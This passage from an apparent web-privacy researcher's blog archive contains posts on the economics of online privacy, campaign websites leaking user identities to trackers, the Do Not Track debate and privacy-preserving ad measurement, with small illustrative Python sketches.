4. The most transparent practice is for you to redirect the user through your origin. You could also use a non-cookie storage technology, though alternatives may be limited by this policy in future. ↩

5. Conventional wisdom in the web privacy community is that users clear their cookies every few months. ↩

Electronic Privacy and Economic Choice

jonathan — Mon, 28 Jan 2013 17:00:07 +0000

Critics of consumer privacy protections frequently invoke revealed preference as a justification for laissez-faire policy. If users really cared about their privacy, the argument goes, we should expect to see revolts against intrusive practices. A number of scholars have demonstrated pervasive information asymmetries¹ and bounded rationality² in consumer privacy choices; the decisions that users actually make about online privacy can hardly be expected to reflect their actual preferences.

But let’s suppose that consumers and online firms are fully informed and completely rational. The economic story that consumers value their privacy less than the marginal income from privacy intrusions is certainly consistent with market behavior.

We should not, however, conclude that the status quo is optimal. There is another congruent economic story, where privacy intrusions are inefficient but nevertheless result owing to transaction costs and competition barriers. This post relates the alternative economic story with two possible examples, then closes with policy implications.

Facebook and Instagram

Consider the recent kerfuffle over Instagram’s user agreement after Facebook acquired the company. An avid Instagram user may have significant concerns about how Facebook might use his or her likeness in advertising products to friends, and the value of those concerns to the user could well exceed the marginal value of new social advertising features to Facebook. The efficient (i.e. welfare-maximizing) outcome would be for Facebook to maintain the preexisting Instagram user agreement.

In a conventional Coasean analysis, Facebook would choose to respect user privacy and extract the welfare gain by charging for its service. From a traditional competition standpoint, if Facebook were to make an inefficient decision to invade consumer privacy, a pro-privacy competitor would spring up and pilfer the site’s users. But what if there are significant transaction costs and competition barriers?³ If Facebook cannot realistically charge its users,⁴ and competition is limited,⁵ then Facebook’s income-maximizing choice is to inefficiently invade consumer privacy. So long as users value social networking on Facebook more than the associated privacy risks, they will continue using the service.

Behavioral Advertising

Behavioral advertising is another possible example. Users may value privacy in their online activities more than the marginal value of tracking-based advertising.⁶ In the absence of transaction costs, online services might do away with behavioral advertising and charge consumers for the content that they access. If there were no competition barriers, services that rely on behavioral advertising might be forced under by free, pro-privacy competitors. Depending on the sector of the online economy, however, a service may have significant transaction costs and competition barriers. The alternative economic story has a measure of predictive power: In some markets with high transaction costs and high barriers to competition (e.g. web search), behavioral advertising is an ordinary practice. Meanwhile, in some markets with low transaction costs and low barriers to competition (e.g. paid mobile apps), behavioral advertising is a rarity.

Policy Implications

If consumer privacy practices are inefficient, then privacy protections could be viewed as mechanisms for correcting structural market failures. Contemporary economic analysis has several lenses to offer:

Internalizing externalities. Online services visit negative privacy externalities upon users; privacy protections compel a service to internalize those externalities.
Solving a collective action problem. If users could collectively negotiate, they would require online services to adopt pro-privacy practices. Users cannot, of course, realistically organize and bind themselves for bargaining at the scale of a mammoth online service. Privacy regulation solves this collective action problem.
Simulating competition. Without competition barriers, online services would be compelled to adopt better privacy practices. Privacy protections stand in for absent effects of competition.
Eliminating an inefficient and unnecessary subsidy. Privacy regulations nix an unjustified payout to online services.

Consumer privacy decision making might also be properly characterized by two choice architecture frames. In the stronger frame, the user is coerced: against a background of society where certain online services are a norm or requirement, the user has no real choice but to give up his or her privacy.⁷ In the weaker frame, the user is exploited: the user has no baseline statistical expectation or moral claim of using an online service, but the value substantially exceeds the privacy risks, and the service would willingly provide functionality without privacy intrusions. If these views are accurate, privacy regulation would constitute a legitimate prohibition against consumer coercion or exploitation.

Parting Thoughts

Privacy reform proponents are quick to cite information asymmetry and bounded rationality as justifications for policy intervention. And they should: the body of research evidence supporting those views is substantial. My aim with this piece is to demonstrate the availability of a second set of arguments, grounded in conventional economics of transaction costs and competition barriers, that would also justify privacy regulation.

If users care about their privacy, why don’t they act like it? Actually, it’s quite possible that they do.

Thanks to Ed Felten and Arvind Narayanan for comments on an early draft. All views and errors are solely my own.

1. For background on information asymmetry in consumer privacy choice, I recommend beginning with work by Lorrie Cranor and Aleecia McDonald.

2. I similarly recommend research by Alessandro Acquisti and Jens Grossklags for an introduction to bounded rationality in consumer privacy choice.

3. A more formal treatment of the two economic stories follows. Assume a user values an online service at S > 0 and his or her marginal privacy on that service at P > 0. An online service marginally values the privacy intrusion at I > 0 and has a baseline income from providing functionality of B. In the oft-invoked revealed preference story, I > P, and privacy regulation imposes a societal loss of I – P. In this alternative economic story, P > I, and lack of privacy regulation imposes a societal loss of P – I. Where there are transaction costs, a transfer is not possible; the only outcomes are (S + P, B) and (S, B + I). In the absence of competition, the service will select an outcome based solely on income maximization. A combination of transaction costs and competition barriers, then, will cause an online service to always invade privacy when I is positive—no matter the relative magnitude of P.
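A small numerical sketch of the transaction costs plus competition barriers case may help. The function names and the example values are hypothetical; the only modeling assumptions are the ones stated above: no transfer is possible, and the service chooses purely on income.

```python
def outcomes(S, P, I, B):
    """Return {choice: (user_value, service_income)} when no transfer is possible."""
    return {
        "respect": (S + P, B),  # service leaves privacy intact
        "invade": (S, B + I),   # service collects the intrusion value I
    }


def service_choice(S, P, I, B):
    """Without competition, the service picks whichever outcome maximizes its income."""
    options = outcomes(S, P, I, B)
    return max(options, key=lambda name: options[name][1])


def societal_loss(S, P, I, B):
    """Welfare lost relative to the efficient outcome, given the service's choice."""
    options = outcomes(S, P, I, B)
    best = max(sum(pair) for pair in options.values())
    chosen = options[service_choice(S, P, I, B)]
    return best - sum(chosen)


# Hypothetical values with P > I: privacy is worth more to the user than
# the intrusion is worth to the service.
choice = service_choice(S=10, P=5, I=2, B=1)
loss = societal_loss(S=10, P=5, I=2, B=1)
```

With these values the service still invades privacy, and the loss equals P – I = 3. Swapping the values so that I > P leaves the choice unchanged but brings the loss to zero, which is the revealed preference story.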

A brief side note: there are three other analytical scenarios worth mentioning.

No transaction costs, no competition barriers. The user would transfer to the service between S + P (the user’s reservation price) and -B (the service’s reservation price). Owing to competitive pressure, the transfer should be closer to -B.
No transaction costs, competition barriers. The user would transfer to the service between S + P (the user’s reservation price) and -B (the service’s reservation price). Since there is no competition, the transfer should be closer to S + P.
Transaction costs, no competition barriers. We would expect an equilibrium respecting privacy where B > 0, and intruding upon privacy where 0 > B. Intuitively, if a pro-privacy competitor would be profitable, it would emerge and undercut the service.

4. There are a number of reasons why Facebook cannot, in practice, charge for its service. A few of the leading considerations:

Network effects. A social network’s value is bound up in the size and engagement of its user base. While some users might pay for privacy, others would not or could not. If Facebook is unable to differentiate between the users it can and cannot charge, then it has to give away the service for free to preserve the value of the social network.
Past promises. Facebook has frequently reaffirmed that its service will always be free. The current landing page, in fact, reads: “It’s free and always will be.” Violating past promises of free service could have significant legal and business implications.
Transaction burdens. Beyond the immediate financial costs, consumers must also incur financial management costs associated with keeping up with a monthly service. From Facebook’s perspective, the firm would have to divert precious attention and resources to developing an unprecedented subscription billing capacity.

The consumer psychology of free vs. paid products is, to be sure, a dominant factor. For purposes of this post, however, set aside the bounded rationality limitation.

5. Many authors and investors have argued that Facebook holds something of a monopoly in social networking.

6. For a discussion of the economics of third-party behavioral advertising, see Part VI of “Third-Party Web Tracking: Policy and Technology.”

7. The notion of moral rights in online services is hotly contested. I do not mean to take a position on the issue here.

Advancing Empirical Legal Scholarship

jonathan — Sat, 29 Dec 2012 01:00:27 +0000

Modern quantitative analysis has upended the social sciences and, in recent years, made exciting inroads with law. How complex are the nation’s statutes?¹ Did a shift in Supreme Court voting dodge President Roosevelt’s court-packing plan?² How do courts apply fair use doctrine in copyright cases?³ What factors determine the outcome of intellectual property litigation?⁴ Researchers have begun to answer these and many more questions through the use of empirical methodologies.

Academics have vaulted numerous hurdles to advance this far, including deep institutional siloing and specialization. But barriers do still exist, and one of the greatest remaining is, quite simply, data. There is no easy-to-get, easy-to-process compilation of America’s primary legal materials. In the status quo, researchers are compelled to spend far too much of their time foraging for datasets instead of conducting valuable analysis. Consequences include diminished scholarly productivity, scant uniformity among published works, and—most frustratingly—deterrence for prospective researchers.

My hope is to facilitate empirical legal scholarship by providing machine-readable primary legal materials. In this first release of data, I have prepared XML versions of the U.S. Code and opinions of the Supreme Court of the United States, through approximately early 2012. Subsequent releases may include additional primary legal materials. I would greatly appreciate feedback from the academic community, particularly with regard to the XML schema, text formatting, and prioritizing materials for release.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.

United States Code: ZIP (110 MB)
Supreme Court of the United States Opinions: ZIP (348 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

1. Michael J. Bommarito II & Daniel M. Katz, A Mathematical Approach to the Study of the United States Code, 389 Physica A 4195 (2010), available at http://www.sciencedirect.com/science/article/pii/S0378437110004875.
2. Daniel E. Ho & Kevin M. Quinn, Did a Switch in Time Save Nine?, 2 J. Legal Analysis 69 (2010), available at http://jla.oxfordjournals.org/content/2/1/69.full.pdf.
3. Matthew Sag, Predicting Fair Use, 73 Ohio St. L.J. 47 (2012), available at http://moritzlaw.osu.edu/students/groups/oslj/files/2012/05/73.1.Sag_.pdf.
4. Mihai Surdeanu et al., Risk Analysis for Intellectual Property Litigation, Proc. 13th Int’l Conf. on Artificial Intelligence & L. 116 (2011), available at http://dl.acm.org/citation.cfm?id=2018375.

Presidential Identifying Information

jonathan — Thu, 01 Nov 2012 15:59:59 +0000

Sunday’s New York Times included a story about how the presidential campaigns are making extensive use of third-party web trackers. In response to privacy concerns, “[o]fficials with both campaigns emphasize[d] that [tracking] data collection is ‘anonymous.’”¹

The campaigns are wrong: tracking data is very often identified or identifiable. Arvind Narayanan has previously written a comprehensive and accessible explanation of why web tracking is hardly anonymous; my survey paper on web tracking provides more extensive discussion.

One of the ways in which web tracking data can become identified or identifiable is “leakage”—data flowing to trackers from the websites that users interact with. Leakage most commonly occurs when a website includes identifying information in a page URL or title. Embedded third parties receive the identifying information if they receive the URL (e.g. referrer headers) or the title (e.g. document.title). Even a little identifying information leakage thoroughly undermines the privacy properties of web tracking: once a user’s identity leaks to a tracker, all of the tracker’s past, present, and future data about the user becomes identifiable.
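As a rough illustration of the leakage described above, the following Python sketch checks whether a known identifier appears in the page URL or title that an embedded third party would receive. The function name, the sample URL, and the sample title are hypothetical; this is a minimal sketch of the idea, not the methodology used in the study.

```python
from urllib.parse import unquote_plus


def find_leaks(identifiers, page_url, page_title):
    """Return the identifiers that appear in a page URL or title.

    Hypothetical helper: a third party that receives the URL (for example,
    in a Referer header) or the title would also receive these values.
    """
    # Decode percent-encoding and '+' so "Leland%20Stanford" matches "Leland Stanford".
    haystack = (unquote_plus(page_url) + " " + page_title).lower()
    return [ident for ident in identifiers if ident.lower() in haystack]


# Hypothetical example values.
leaks = find_leaks(
    ["leland.stanford", "Leland Stanford", "94305"],
    "https://example.com/people/leland.stanford/edit",
    "Dashboard - Leland Stanford",
)
print(leaks)
```

Here the username and the name are flagged, while the ZIP code is not, because it appears in neither the URL nor the title.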

Web services frequently fail to account for information leakage in their design and testing; a study I conducted last year found that over half of popular websites were leaking identifying information.² More than a few website operators have made inaccurate representations about the information they share with third parties; in just the past year the Federal Trade Commission settled deception claims against both Facebook and Myspace for falsely disclaiming identifying information leakage.

The Times coverage piqued my curiosity: Are the campaigns identifying their supporters to third-party trackers? Are they directly undermining the anonymity properties that they are so quick to invoke?

Yes, they are. I tested the two leading candidate websites using the methodology from my prior study of identifying information leakage. Both leak. The following sections describe my observations from the Barack Obama and Mitt Romney campaign websites.

Barack Obama

Username. Several pages include the username in their URL or title, including the user preferences page, the social organizing “Dashboard” profile page, the Dashboard profile editing page, and the Dashboard personal statistics page.³

A sample of pages that include the username in their URL or title.

In my testing, username leaked to ten companies.⁴

A username is often personally identifying. It might simply be a user’s name, or it could enable linking other public accounts and information about the user. Several companies have already deployed effective username linkage in their products.

The default username selection on barackobama.com facilitates identifying users. If the user registers with a Facebook account, the username defaults to the user’s name in dot-separated format (e.g. leland.stanford). If the user signs up with just an email address, the default username is the first part of the user’s email address—which will often be some form of the user’s name or a fanciful username shared with other services.
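To make the two defaults concrete, here is a small Python sketch. The function names and the exact normalization rules are assumptions for illustration; the site's real logic was not published and may differ in details such as handling of middle names or special characters.

```python
def default_username_from_name(full_name):
    """Assumed rule: lowercase the name and join its parts with dots."""
    return ".".join(full_name.lower().split())


def default_username_from_email(email):
    """Assumed rule: take the part of the address before the '@'."""
    return email.split("@", 1)[0]


print(default_username_from_name("Leland Stanford"))
print(default_username_from_email("lstanford@example.com"))
```

In both cases the default username is derived directly from information that can identify the user.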

The design of the Dashboard website also enables connecting a username to a user’s identity. Any signed-in user (including someone trying to identify tracking data) can look up a user’s profile from their username. Unless a user opts out, their profile page will include their name.



Left: Logged-in view of another user’s Dashboard profile page.
Right: Option to display last initial instead of last name on the user’s profile page.

Name. The title of the Dashboard profile page incorporates the user’s name. A script on the page reports impression information to Chartbeat, including the page title.⁵

A user’s Dashboard profile page.

Street Address and ZIP Code. If a user searches for an organizing team in Dashboard, the results page includes the query street address and ZIP code in its URL. It appears new Dashboard users are required to search for a team.

Left: Dashboard landing page.
Right: Searching for a team in Dashboard.

Similarly, the results page for finding an event includes the query ZIP code in its URL.

Searching for an event.

I spotted the street address and ZIP code leaking to nine companies, and just the ZIP code leaking to one other company.⁶

Mitt Romney

Name. The post-login landing page and most preference pages include the user’s name in their title.

A post-login landing page (email signup) and a sample of preference pages.

Scripts from two companies collect the page title as part of their impression reporting.⁷

Partial Email Address. If a user registers with their Facebook account, the post-login landing page URL incorporates the first part of the user’s email address (with non-alphanumeric characters removed).

Mock-up of a post-login landing page (Facebook signup).

Thirteen companies received the partial email address.⁸

User ID. Many pages include a unique user ID in their URL, which leaks to the same companies.⁹

A sample of pages that include the user ID in their URL.

The ID itself is not identifying information, and mittromney.com does not provide social functionality that would facilitate mapping a user ID to a user’s name. It appears, however, that a quirk in mittromney.com can allow anyone (even not logged in) to determine a user’s name from their ID. If the user has recently visited a URL that includes their user ID, anyone who visits that URL in the following (very roughly) fifteen minutes can view the user’s name in the page heading.¹⁰

Logged-out view of a recent user’s profile editing page.

A tracker could identify users by waiting for them to land on one of these URLs, then visiting it and extracting the user’s name. Alternatively, anyone in possession of tracking data could periodically test these user ID URLs.

ZIP Code. The results page for an events search includes the query ZIP code in its URL.¹¹

Results page for an events search.

The ZIP code leaked to the same companies as the partial email address and user ID.

Takeaways

The major presidential campaigns both fell short of best practices in their website design and testing, and they both misrepresented their privacy practices to the Times. The Gray Lady also deserves a light rap on the knuckles for insufficiently scrutinizing the campaigns’ anonymity assertions.

But, in my view, the greatest takeaway is that the myth of web tracking’s anonymity has proven remarkably resilient, despite compelling research results and practical experience to the contrary. Companies and trade groups in the tracking business community frequently invoke unfounded claims of anonymity. Policymakers, website operators, and journalists all too often repeat those claims, apparently even when they’re of the highest caliber.

My hope is that this episode serves as a learning opportunity and a reminder: there is no such thing as anonymous web tracking.

Thanks to Ed Felten and Arvind Narayanan for valuable comments on a draft. All errors are solely my own.

1. An Obama campaign spokesman went even further, asserting “[w]e do not provide any personal information to outside entities.” The barackobama.com privacy policy disclaims responsibility for third-party data collection. The mittromney.com privacy policy reserves unfettered discretion to share information with third parties. Strangely, it also includes a provision about “opt[ing] out from our cookies” and other information collected by the website—and then provides a link to opt out of Google’s third-party advertising cookies.

2. Balachander Krishnamurthy, Craig Wills, and colleagues conducted the seminal studies of identifying information leakage (1, 2, 3, 4, 5).

3. For example, respectively, https://www.barackobama.com/account/robber.baron, https://dashboard.barackobama.com/people/robber.baron, https://dashboard.barackobama.com/people/robber.baron/edit, and https://dashboard.barackobama.com/people/robber.baron/numbers.

4. The companies were: Akamai (CDN used by Chartbeat), Amazon (Amazon Web Services used by the campaign and New Relic), BrightTag, Chartbeat, Facebook, Google (Analytics, DoubleClick, and Hosted Libraries), Hoefler & Frere-Jones (typography.com), New Relic, Think Realtime, and Zendesk. Here and throughout this post I err on the side of comprehensiveness in listing third parties that receive data. Opinions differ on the privacy risks associated with various service providers (e.g. Akamai, Amazon Web Services, and Google Analytics). My intent is not to take a position on that issue, but rather, convey sufficient information to satisfy readers across the spectrum of views.

5. The page title might be, for example, Dashboard - Leland Stanford. The Chartbeat script would report back with a URL like https://ping.chartbeat.net/ping?...i=Leland%20Stanford%20-%20Dashboard....

6. The results page for a Dashboard teams search has a URL formatted like https://dashboard.barackobama.com/teams/match?street=353+Serra+Mall&zip=94305.... The results page URL for an events search has a format like https://my.barackobama.com/page/event/search_results?...zip_radius%5B0%5D=94305. I observed the street address and ZIP code leak to: Akamai (CDN used by Chartbeat), Amazon (Amazon Web Services used by the campaign and New Relic), Chartbeat, Facebook, Google (Analytics), Hoefler & Frere-Jones (typography.com), New Relic, Optimizely, and Zendesk. ZIP code also leaked to BrightTag and Google (Maps API).

7. The post-login landing page title has the form Leland Stanford | Mitt Romney for President. A ShareThis script reports back to a URL like https://l.sharethis.com/pview?...title=Leland%20Stanford%20%7C%20Mitt%20Romney%20for%20President..., and a Syncapse script contacts a URL like https://cn.clickable.net/?...title=Leland%20Stanford%20%7C%20Mitt%20Romney%20for%20President....

8. An example post-login landing page URL for a Facebook user: https://www.mittromney.com/users/lelandstanford. The thirteen companies who received the first portion of the user’s email address were: Adobe (Typekit), Akamai (hosting used by the campaign), Amazon (Amazon Web Services used by New Relic and Search Discovery), Compete, comScore (Scorecard Research), Facebook, Google (Ad Services and DoubleClick), Lotame, New Relic, Optimizely, Search Discovery, ShareThis, and Syncapse.

9. No matter how a user registers, many pages include a unique user ID in their URL. A preferences page, for example, might have the URL https://www.mittromney.com/user/123456789/edit. If the user signs up without a social network login, the post-login landing page has the generic URL https://www.mittromney.com/user. If the user signs up with a Facebook or Twitter account, however, the landing page URL also includes a unique user ID—but assigned with a different scheme. The Facebook ID allocation system is discussed above; Twitter post-login URLs take the form https://www.mittromney.com/users/12345.

10. My best hypothesis is that this property arises from a caching misconfiguration; page content is correctly dynamic between users, but page headings are incorrectly cached for a period independent of user permissions.

11. Thanks to Natasha Singer for identifying ZIP code leakage on mittromney.com.

The Trouble with ID Cookies: Why Do Not Track Must Mean Do Not Collect

jonathan — Fri, 10 Aug 2012 19:00:50 +0000

Original at the Stanford Center for Internet and Society.

Co-authored by Arvind Narayanan.

The debate over the meaning of Do Not Track has raged for well over a year now. The primary forum is the W3C Tracking Protection Working Group, with frequent sparring in the press and capitals worldwide. There are, broadly, two Do Not Track proposals: one chiefly backed by the ad industry, and another advanced by privacy advocates [1]. These proposals reflect vastly different visions for Do Not Track with vastly different practical consequences. The two sides have unsurprisingly been at loggerheads, with scant movement towards resolution of the key issues.

The ad industry position is, and has been for over a decade, that data collection and retention should be largely unfettered so long as they are associated with a permitted business use [2]. At present these permitted-use exceptions totally swallow the rule, in practice barring little more than behavioral advertisement targeting (1, 2). (Critics often deride the status quo as “Do Not Target.”) A recent proposal by Yahoo! would add, in our view, only modest transparency requirements to the industry position.

But suppose the advertising industry were to meaningfully tighten its permitted uses and retention periods. Would privacy advocates, academics, and policymakers continue to object?

Yes. The industry approach to Do Not Track entirely misses the most serious privacy concerns associated with tracking, including:

Sensitive information. A user’s browsing history can include remarkably sensitive information, such as medical conditions and financial challenges (e.g. 1, 2). Individual users are often identified or easily identifiable (1, 2, 3).

Lack of consumer control. Users are generally unaware of who’s tracking them and how. Existing consumer control tools are difficult to discover and use, and they vary significantly in effectiveness.

Lack of market pressure. Since consumers are unaware of and lack control over tracking, third-party websites are under limited pressure to implement adequate security and privacy protections. Furthermore, many third parties are small, young, growth-oriented companies; security and privacy are not priorities.

Surveillance. Government requests for data stored in the cloud are becoming a regular occurrence, and many companies hand over data in response to such requests without informing users. If ad companies’ claims about the inferential power of tracking data are correct, then the potential for surveillance is correspondingly worrisome.

A toughened version of the industry’s position would also have significant practical shortcomings.

Fragile. Many systems are configured for comprehensive logging by default. It takes only the slightest oversight to begin unintentionally amassing data.

Unverifiable. There is no straightforward way to externally test whether a company is limiting its information retention and use [3].

Lock-in. As the online economy and its technology infrastructure change, use-based definitions are likely to become dated. A rigid use-based approach could lock in current advertising business practices, stifling innovation, or motivate some companies to bend the rules and justify tracking for an ever-expanding set of uses.

The privacy advocates’ definition of Do Not Track takes a much different tack: it would allow (just about) any third-party business practice, so long as it does not impose the privacy risk of collecting a user’s browsing history. A cookie that remembers a language preference would be allowed, for example, while a unique ID cookie would not be allowed [4].

The advocates’ solution avoids the shortcomings of the ad industry approach, and is particularly elegant for two reasons.

Privacy-preserving alternatives. There are simple technological solutions to implement most or all current advertising ecosystem functionality, as we have detailed in the “Tracking Not Required” series (overview talk, frequency capping, behavioral targeting, measurement). Shifting to these architectures would involve switching costs, and in some use cases they would underperform current implementations. That said, we believe it’s quite reasonable for ad companies to incur these minor burdens in exchange for the significant privacy benefits.

Verifiable. Tracking carried out in violation of this interpretation of DNT is externally detectable. This is a crucial point. Some tracking techniques store a unique ID in a user’s device (“supercookies”); others read attributes from a user’s device that, in combination, become unique (“fingerprinting”). Both approaches require accessing browser functionality in a manner that is, in principle, detectable.

It would also be detectable in practice: a “Web Privacy Measurement” community has sprung up that has the tools and motivation to police the web for DNT violations. Automated external detection will never achieve 100% accuracy, but it has proven highly effective at flagging possible privacy-violating information flows for manual inspection by analysts. In the worst case, it provides a basis of suspicion for regulators to conduct audits, whereas with the use-based approach audits would essentially have to be conducted blindly. As long as there is a significant chance that violators will be caught, external policing will have a strong deterrent effect. Companies will be both disincentivized from intentionally gaming DNT and incentivized to institutionalize practices that ensure compliance [5].
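One heuristic that an external measurement tool might apply, sketched below in Python, is to visit the same third party from two fresh browser profiles and flag stored values that are long and differ between the profiles. Values that are identical for every visitor, such as a language preference, are not flagged. The function name, the length threshold, and the sample cookie data are assumptions for illustration; flagged values would still need manual inspection.

```python
def candidate_id_cookies(profile_a, profile_b, min_length=8):
    """Flag cookie names whose values look like per-user identifiers.

    profile_a and profile_b map cookie names to values observed in two
    independent, fresh browser profiles. The min_length threshold is an
    arbitrary assumption.
    """
    flagged = []
    for name in sorted(profile_a.keys() & profile_b.keys()):
        value_a, value_b = profile_a[name], profile_b[name]
        # A value shared by every visitor cannot single out one user.
        if value_a == value_b:
            continue
        # Short values carry too little information to be a unique ID.
        if min(len(value_a), len(value_b)) < min_length:
            continue
        flagged.append(name)
    return flagged


# Hypothetical observations from two fresh profiles.
first = {"lang": "en-US", "uid": "a81f3c9e5d7b4420", "ab": "1"}
second = {"lang": "en-US", "uid": "77c0e2b19f6a4d3e", "ab": "0"}
print(candidate_id_cookies(first, second))
```

Only the `uid` cookie is flagged in this example: `lang` is the same in both profiles, and `ab` differs but is too short to identify a user.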

In conclusion, the Do Not Track negotiations are nearing an impasse, while third-party tracking continues at unprecedented scale. If advertising companies and other third parties don’t step up to the plate, browser vendors and regulators will likely turn to heavy-handed alternatives. We reiterate our belief that a collection-based definition of Do Not Track combined with a deployment of client-side functionality is the ideal outcome for all stakeholders.

[1] The proposal is co-authored by Jonathan Mayer, who is also one of the authors of this post.

[2] The paper “Third-Party Web Tracking: Policy and Technology” includes an expanded explanation of industry self-regulatory initiatives.

[3] This CMU Cylab study is one of many demonstrating widespread non-compliance with stated policies.

[4] Protocol information (including IP address and User-Agent string) could still be collected and retained for a short duration. This assuredly introduces some privacy risk, but it is much smaller than the risk associated with long-term retention of uniquely identifying information.

[5] Some smaller players, especially those located in jurisdictions where there is no potential legal liability for non-compliance, might simply ignore DNT. The dynamics of the online advertising market mitigate the privacy risks associated with these companies; reputable first-party websites are unlikely to deploy these services. Furthermore, some technical countermeasures (i.e. blocking) are possible against non-compliant companies. The more privacy-forward browser vendors might even choose to enable countermeasures by default.

Tracking Not Required: Advertising Measurement

jonathan — Tue, 24 Jul 2012 19:38:36 +0000

Co-authored by Arvind Narayanan.

Measurement is central to online advertising: it facilitates billing, performance measurement, targeting decisions, spending allocation, and more. In a pair of earlier posts we explained how advertisement frequency capping and behavioral targeting are achievable without compiling a user’s browsing history. This post similarly proposes practical, privacy-improved approaches to advertising measurement.

There are, broadly, three advertising events that might require measurement.

Impression. An advertisement is displayed to a user. Measured details might include the webpage the ad was served on, the time the ad was served, the user’s location, and the user’s browser.¹

Click. The user clicks the ad.

Action. After viewing the ad, the user later does something on a different webpage. For example, the user might buy the product or service that was advertised. An action may occur days or weeks after an impression.

Sometimes advertisers pay per impression (“CPM” billing), sometimes per click (“CPC”), sometimes per action (“CPA”), and sometimes for a combination of these events (“hybrid”).

The following sections explain how to conduct a privacy-improved measurement of each advertising event.

Impression

When a user’s browser loads an advertisement, the company serving the ad ordinarily learns the URL of the current webpage,² as well as the user’s IP address and User-Agent string.³ Practical, privacy-improved impression measurement is a granularity problem: How can a website generalize the impression data it collects without substantially compromising the utility of that data?

Requirements will undoubtedly vary by service. We present here a rough design spectrum of the information that a third-party website might retain.⁴

Information    | Current Approach   | Better Approach             | Even Better Approach
Webpage        | URL                | Fully qualified domain name | Public suffix + 1
Time           | Precise timestamp  | Day                         | Week
User Location  | IP address         | Truncated IP address        | Coarse geolocation
Browser        | User-Agent string  | Browser/OS major versions   | Browser/OS
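The “Better Approach” column can be sketched in a few lines of Python. The function name, the record field names, and the /24 (IPv4) and /48 (IPv6) truncation lengths are assumptions chosen for illustration. Reducing a hostname to public suffix + 1 would additionally require the Public Suffix List, which this sketch does not include.

```python
import ipaddress
from datetime import datetime, timezone
from urllib.parse import urlsplit


def generalize_impression(page_url, timestamp, ip, browser, major_version):
    """Coarsen one impression record before it is retained.

    The truncation lengths and field names are illustrative assumptions.
    """
    address = ipaddress.ip_address(ip)
    prefix = 24 if address.version == 4 else 48
    network = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
    return {
        # Keep only the fully qualified domain name, not the path or query.
        "site": urlsplit(page_url).hostname,
        # Keep only the calendar day (UTC), not the precise time.
        "day": timestamp.astimezone(timezone.utc).date().isoformat(),
        # Zero the low-order bits of the IP address.
        "ip_prefix": str(network),
        # Keep only the browser name and major version.
        "browser": f"{browser} {major_version}",
    }


record = generalize_impression(
    "https://news.example.com/politics/story?id=42",
    datetime(2012, 7, 24, 19, 38, 36, tzinfo=timezone.utc),
    "203.0.113.77",
    "Firefox",
    14,
)
print(record)
```

The retained record no longer contains the article path, the time of day, the full IP address, or the complete User-Agent string.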

Click

Click measurement is exactly the same as impression measurement, with just one extra piece of information: whether the user clicked the ad.⁵

Action

Action measurement is a more difficult engineering problem. An ad impression is, for measurement purposes, a one-shot event: it occurs within the context of a single webpage. Measuring an action, on the other hand, requires linking an ad impression on one webpage with a subsequent action on another webpage.⁶

A pairing of client-side storage and selective information disclosure can enable privacy-improved action measurement, much like our previous approaches to frequency capping and behavioral targeting. When an ad is displayed, information about the impression can be stored in the browser. If the user later completes an action, the ad company can query the browser for relevant impression information.

Implementing a prototype of our action measurement algorithm was straightforward using HTML 5 local storage. Source is available on GitHub. Performance is a non-issue, as with our prototypes for frequency capping and behavioral targeting.
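The idea can be sketched in Python, with a small class standing in for the browser's storage. This is not the prototype from the GitHub repository; the class, the function, and the campaign names are hypothetical, and a real implementation would run as JavaScript against HTML5 local storage.

```python
class BrowserStorage:
    """Stand-in for per-origin browser storage such as HTML5 local storage."""

    def __init__(self):
        self._impressions = []

    def record_impression(self, campaign, day):
        # Stored on the client only; nothing is sent to the ad company here.
        self._impressions.append({"campaign": campaign, "day": day})

    def impressions_for(self, campaign):
        # Selective disclosure: reveal only records for the queried campaign.
        return [i for i in self._impressions if i["campaign"] == campaign]


def report_action(storage, campaign):
    """Build the report sent when the user completes an action.

    Returns None when the browser holds no impression for the campaign, so
    unrelated ad history is never disclosed.
    """
    matches = storage.impressions_for(campaign)
    if not matches:
        return None
    return {"campaign": campaign, "impressions": len(matches)}


storage = BrowserStorage()
storage.record_impression("shoes-summer", "2012-07-20")
storage.record_impression("travel-deals", "2012-07-21")
print(report_action(storage, "shoes-summer"))
print(report_action(storage, "laptops"))
```

The ad company learns that an action followed one impression for the queried campaign, but learns nothing about the other ads the user has seen.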

1. Many advertising companies also record whether this was a first-time (“unique”) impression. Our algorithm for frequency capping can be trivially modified to provide this functionality.

2. Third-party websites usually learn the first-party webpage URL from a Referer header or explicit Request-URI parameter. There are some methods for a first-party webpage to hide its URL from third-party content, including iframe sandboxing and the HTML 5 noreferrer link annotation. For the moment, these techniques are not sufficiently simple, comprehensive, or supported to anticipate widespread use.

3. A semi-trusted intermediary or anonymizing network could conceal or generalize a user’s IP address, User-Agent string, and other information. See Adnostic and Privad for examples. These approaches are, at present, not practical for broad deployment.

4. Present Do Not Track proposals diverge on impression measurement; some would allow current approaches to continue, while others would require quickly generalizing impression data.

5. Do Not Track would allow the current approach to click measurement since the user has (somewhat constructively) interacted with content from the advertising company.

6. Because of this property, some Do Not Track proposals would require a privacy-improved approach to action measurement.

Do Track: Browser-Based Do Not Track Exceptions

jonathan — Mon, 02 Jul 2012 07:54:14 +0000

Users hold widely varying preferences on web tracking.¹ Some don’t mind the practice. Some object to it entirely. Many trust certain organizations to follow them around the web.

Do Not Track accommodates these divergent preferences in two ways. First, browsers and other user agents include an option for universally signaling a preference against tracking (“DNT: 1”). Firefox, Internet Explorer, and Safari have all integrated this feature, and Chrome will support it by the end of the year. Second, a user can configure exceptions to the universal signal. Some websites may choose to build a proprietary “out-of-band” exception mechanism, using ordinary web technologies, that trumps the “DNT: 1” signal. The Do Not Track Cookbook includes an example of how a Facebook out-of-band exception mechanism might appear.

The W3C Do Not Track standard will provide another option: a simple JavaScript interface that allows a website to request an exception, paired with a signal that some tracking is allowed (“DNT: 0”).
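On the receiving side, a website has to interpret whichever signal arrives. The Python sketch below shows one way a server might read the header; the function name and the returned labels are hypothetical, and it assumes the request headers have already been collected into a dictionary with lowercase names.

```python
def tracking_preference(headers):
    """Interpret the DNT request header.

    headers maps lowercase header names to values. Returns "no-tracking" for
    "DNT: 1", "tracking-allowed" for "DNT: 0", and "unset" otherwise.
    """
    value = headers.get("dnt", "").strip()
    if value == "1":
        return "no-tracking"
    if value == "0":
        return "tracking-allowed"
    return "unset"


print(tracking_preference({"dnt": "1"}))
print(tracking_preference({"dnt": "0"}))
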